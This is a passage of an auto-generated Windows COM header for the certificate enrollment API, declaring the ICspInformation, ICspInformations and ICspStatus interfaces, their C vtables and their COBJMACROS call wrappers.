#define ICspAlgorithms_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspAlgorithms_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspAlgorithms_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspAlgorithms_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspAlgorithms_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspAlgorithms_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspAlgorithms_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspAlgorithms_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspAlgorithms_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspAlgorithms_get_ItemByName(This,strName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppValue) ) 

#define ICspAlgorithms_get_IndexByObjectId(This,pObjectId,pIndex)	\
    ( (This)->lpVtbl -> get_IndexByObjectId(This,pObjectId,pIndex) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspAlgorithms_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0008 */
/* [local] */ 

typedef 
enum X509KeySpec
    {
        XCN_AT_NONE	= 0,
        XCN_AT_KEYEXCHANGE	= 1,
        XCN_AT_SIGNATURE	= 2
    } 	X509KeySpec;





extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0008_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0008_v0_0_s_ifspec;

#ifndef __ICspInformation_INTERFACE_DEFINED__
#define __ICspInformation_INTERFACE_DEFINED__

/* interface ICspInformation */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspInformation;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab307-217d-11da-b2a4-000e7bbb2b09")
    ICspInformation : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromName( 
            /* [in] */ __RPC__in BSTR strName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromType( 
            /* [in] */ X509ProviderType Type,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ VARIANT_BOOL MachineContext) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspAlgorithms( 
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_HasHardwareRandomNumberGenerator( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsHardwareDevice( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsRemovable( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsSoftwareDevice( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Valid( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MaxKeyContainerNameLength( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out X509ProviderType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Version( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_IsSmartCard( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetDefaultSecurityDescriptor( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_LegacyCsp( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCspStatusFromOperations( 
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspInformationVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspInformation * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspInformation * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspInformation * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspInformation * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspInformation * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromName )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in BSTR strName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromType )( 
            __RPC__in ICspInformation * This,
            /* [in] */ X509ProviderType Type,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ VARIANT_BOOL MachineContext);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspAlgorithms )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_HasHardwareRandomNumberGenerator )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsHardwareDevice )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsRemovable )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsSoftwareDevice )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Valid )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MaxKeyContainerNameLength )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out X509ProviderType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Version )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeySpec )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out X509KeySpec *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_IsSmartCard )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetDefaultSecurityDescriptor )( 
            __RPC__in ICspInformation * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_LegacyCsp )( 
            __RPC__in ICspInformation * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatusFromOperations )( 
            __RPC__in ICspInformation * This,
            /* [in] */ __RPC__in_opt IObjectId *pAlgorithm,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        END_INTERFACE
    } ICspInformationVtbl;

    interface ICspInformation
    {
        CONST_VTBL struct ICspInformationVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspInformation_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspInformation_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspInformation_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspInformation_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspInformation_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspInformation_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspInformation_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspInformation_InitializeFromName(This,strName)	\
    ( (This)->lpVtbl -> InitializeFromName(This,strName) ) 

#define ICspInformation_InitializeFromType(This,Type,pAlgorithm,MachineContext)	\
    ( (This)->lpVtbl -> InitializeFromType(This,Type,pAlgorithm,MachineContext) ) 

#define ICspInformation_get_CspAlgorithms(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspAlgorithms(This,ppValue) ) 

#define ICspInformation_get_HasHardwareRandomNumberGenerator(This,pValue)	\
    ( (This)->lpVtbl -> get_HasHardwareRandomNumberGenerator(This,pValue) ) 

#define ICspInformation_get_IsHardwareDevice(This,pValue)	\
    ( (This)->lpVtbl -> get_IsHardwareDevice(This,pValue) ) 

#define ICspInformation_get_IsRemovable(This,pValue)	\
    ( (This)->lpVtbl -> get_IsRemovable(This,pValue) ) 

#define ICspInformation_get_IsSoftwareDevice(This,pValue)	\
    ( (This)->lpVtbl -> get_IsSoftwareDevice(This,pValue) ) 

#define ICspInformation_get_Valid(This,pValue)	\
    ( (This)->lpVtbl -> get_Valid(This,pValue) ) 

#define ICspInformation_get_MaxKeyContainerNameLength(This,pValue)	\
    ( (This)->lpVtbl -> get_MaxKeyContainerNameLength(This,pValue) ) 

#define ICspInformation_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define ICspInformation_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define ICspInformation_get_Version(This,pValue)	\
    ( (This)->lpVtbl -> get_Version(This,pValue) ) 

#define ICspInformation_get_KeySpec(This,pValue)	\
    ( (This)->lpVtbl -> get_KeySpec(This,pValue) ) 

#define ICspInformation_get_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> get_IsSmartCard(This,pValue) ) 

#define ICspInformation_GetDefaultSecurityDescriptor(This,MachineContext,pValue)	\
    ( (This)->lpVtbl -> GetDefaultSecurityDescriptor(This,MachineContext,pValue) ) 

#define ICspInformation_get_LegacyCsp(This,pValue)	\
    ( (This)->lpVtbl -> get_LegacyCsp(This,pValue) ) 

#define ICspInformation_GetCspStatusFromOperations(This,pAlgorithm,Operations,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusFromOperations(This,pAlgorithm,Operations,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspInformation_INTERFACE_DEFINED__ */


#ifndef __ICspInformations_INTERFACE_DEFINED__
#define __ICspInformations_INTERFACE_DEFINED__

/* interface ICspInformations */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspInformations;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab308-217d-11da-b2a4-000e7bbb2b09")
    ICspInformations : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspInformation *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE AddAvailableCsps( void) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppCspInformation) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetCspStatusFromProviderName( 
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ X509KeySpec LegacyKeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE GetCspStatusesFromOperations( 
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetEncryptionCspAlgorithms( 
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetHashAlgorithms( 
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspInformationsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspInformations * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspInformations * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspInformations * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspInformations * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspInformations * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspInformations * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspInformations * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspInformations * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspInformations * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspInformations * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *AddAvailableCsps )( 
            __RPC__in ICspInformations * This);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppCspInformation);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetCspStatusFromProviderName )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in BSTR strProviderName,
            /* [in] */ X509KeySpec LegacyKeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *GetCspStatusesFromOperations )( 
            __RPC__in ICspInformations * This,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetEncryptionCspAlgorithms )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithms **ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetHashAlgorithms )( 
            __RPC__in ICspInformations * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCspInformation,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        END_INTERFACE
    } ICspInformationsVtbl;

    interface ICspInformations
    {
        CONST_VTBL struct ICspInformationsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspInformations_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspInformations_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspInformations_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspInformations_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspInformations_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspInformations_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspInformations_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspInformations_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspInformations_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspInformations_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspInformations_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspInformations_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspInformations_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspInformations_AddAvailableCsps(This)	\
    ( (This)->lpVtbl -> AddAvailableCsps(This) ) 

#define ICspInformations_get_ItemByName(This,strName,ppCspInformation)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppCspInformation) ) 

#define ICspInformations_GetCspStatusFromProviderName(This,strProviderName,LegacyKeySpec,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusFromProviderName(This,strProviderName,LegacyKeySpec,ppValue) ) 

#define ICspInformations_GetCspStatusesFromOperations(This,Operations,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetCspStatusesFromOperations(This,Operations,pCspInformation,ppValue) ) 

#define ICspInformations_GetEncryptionCspAlgorithms(This,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetEncryptionCspAlgorithms(This,pCspInformation,ppValue) ) 

#define ICspInformations_GetHashAlgorithms(This,pCspInformation,ppValue)	\
    ( (This)->lpVtbl -> GetHashAlgorithms(This,pCspInformation,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspInformations_INTERFACE_DEFINED__ */


#ifndef __ICspStatus_INTERFACE_DEFINED__
#define __ICspStatus_INTERFACE_DEFINED__

/* interface ICspStatus */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspStatus;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab309-217d-11da-b2a4-000e7bbb2b09")
    ICspStatus : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt ICspInformation *pCsp,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pAlgorithm) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Ordinal( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Ordinal( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspInformation( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentStatus( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DisplayName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspStatusVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspStatus * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspStatus * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspStatus * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspStatus * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspStatus * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICspStatus * This,
            /* [in] */ __RPC__in_opt ICspInformation *pCsp,
            /* [in] */ __RPC__in_opt ICspAlgorithm *pAlgorithm);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Ordinal )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Ordinal )( 
            __RPC__in ICspStatus * This,
            /* [in] */ LONG Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspAlgorithm )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspAlgorithm **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformation )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentStatus )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DisplayName )( 
            __RPC__in ICspStatus * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICspStatusVtbl;

    interface ICspStatus
    {
        CONST_VTBL struct ICspStatusVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


